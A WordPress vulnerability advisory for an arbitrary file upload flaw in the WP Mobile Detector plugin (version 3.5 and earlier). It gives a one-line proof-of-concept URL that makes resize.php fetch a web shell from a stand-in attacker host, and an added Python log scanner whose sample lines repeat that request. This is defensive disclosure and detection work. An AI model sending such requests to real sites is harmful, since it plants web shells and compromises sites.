WP Mobile Detector <= 3.5 - Arbitrary File Upload



Proof of Concept
As seen in access logs:
http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php
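
Added example (not part of the original advisory): a log check for the request shape shown above, flagging any request to the plugin's resize.php whose src parameter is a remote http(s) URL, including percent-encoded forms. The function name, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jun/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php HTTP/1.1" 200 0 "-" "curl/7.47"
203.0.113.9 - - [03/Jun/2016:10:13:44 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2Fwww.evil.com%2Fshell.php HTTP/1.1" 200 0 "-" "-"
198.51.100.4 - - [03/Jun/2016:10:15:02 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=images/logo.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [03/Jun/2016:10:15:09 +0000] "GET /index.php?src=https://www.example.org/a.png HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# client IP, timestamp, request target and status from a combined-format line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT = "/wp-mobile-detector/resize.php"


def find_remote_src_requests(log_text):
    """Return one dict per request to resize.php whose src is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        target = urlsplit(m["target"])
        if not target.path.lower().endswith(SCRIPT):
            continue
        # parse_qs percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        for src in parse_qs(target.query).get("src", []):
            remote = urlsplit(src.strip())
            if remote.scheme.lower() in ("http", "https") and remote.netloc:
                hits.append({"ip": m["ip"], "time": m["ts"],
                             "status": int(m["status"]),
                             "remote_host": remote.hostname, "src": src})
    return hits


if __name__ == "__main__":
    for hit in find_remote_src_requests(SAMPLE_LOG):
        print(hit)
```

A hit with a 2xx status on a site running version 3.5 or earlier is a reason to inspect the plugin directory for files that did not ship with the plugin.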

Affects Plugin

Fixed in version 3.6 - plugin closed

References

URL https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
URL https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/
URL https://wordpress.org/plugins/wp-mobile-detector/changelog/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter firefart
Submitter Website https://firefart.at/
Submitter Twitter _FireFart_
Views 7058
Verified No
WPVDB ID 8505

Timeline

Publicly Published 2016-06-03 (about 4 years ago)
Added 2016-06-03 (about 4 years ago)
Last Updated 2019-11-01 (8 months ago)
